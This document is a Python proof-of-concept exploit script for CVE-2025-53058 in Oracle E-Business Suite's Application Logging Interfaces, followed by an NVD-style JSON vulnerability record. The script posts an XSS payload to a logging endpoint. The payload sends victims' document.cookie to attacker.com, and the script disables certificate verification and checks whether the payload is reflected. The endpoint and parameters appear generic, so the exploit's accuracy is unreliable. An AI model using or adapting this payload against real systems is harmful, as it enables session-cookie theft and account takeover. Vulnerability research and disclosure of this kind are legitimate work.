CVE-2025-53058

# CVE-2025-53058 - Oracle E-Business Suite Application Logging Interfaces PoC # Vulnerability: Unauthenticated XSS / Unauthorized Access via HTTP # Affected: Oracle E-Business Suite 12.2.3 - 12.2.14 # Component: Oracle Applications Manager - Application Logging Interfaces import requests TARGET_URL = "https://target-oracle-ebs.example.com" LOGGING_ENDPOINT = "/oa_html/appslog/" # Step 1: Craft malicious payload targeting the logging interface # The vulnerability exists in Application Logging Interfaces where user input # is not properly sanitized before being processed/logged def craft_malicious_request(): """ Craft a malicious HTTP request that exploits the logging interface. The payload targets the log parameter which is reflected/stored without proper sanitization. """ # XSS payload injected into logging parameter payload = { "log_message": "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>", "log_level": "INFO", "module": "FND", "action": "logEntry" } return payload def exploit(): """ Main exploit function - sends malicious request to Oracle Applications Manager logging interface. """ session = requests.Session() # Step 2: Send the malicious request to the vulnerable endpoint url = f"{TARGET_URL}{LOGGING_ENDPOINT}" try: response = session.post( url, data=craft_malicious_request(), headers={ "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (compatible; OracleEBS-Exploit)" }, verify=False ) if response.status_code == 200: print(f"[+] Request sent successfully to {url}") print(f"[+] Response length: {len(response.text)}") # Check if payload was reflected (indicating XSS vulnerability) if "<script>" in response.text: print("[!] Payload reflected in response - XSS confirmed") else: print(f"[-] Unexpected status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-53058 PoC - Oracle E-Business Suite") print("Oracle Applications Manager - Application Logging Interfaces") print("Affected: 12.2.3 - 12.2.14") print("=" * 60) exploit()

{"cve": {"id": "CVE-2025-53058", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:45.487", "lastModified": "2025-10-23T16:05:11.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Applications Manager product of Oracle E-Business Suite (component: Application Logging Interfaces). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Manager. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Manager, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Manager accessible data as well as unauthorized read access to a subset of Oracle Applications Manager accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:applications_manager:*:*:*:*:*:*:*:*", "versionStartIncluding": "12.2.3", "versionEndIncluding": "12.2.14", "matchCriteriaId": "5C3FC527-3146-4535-8D8E-9842DE917B63"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}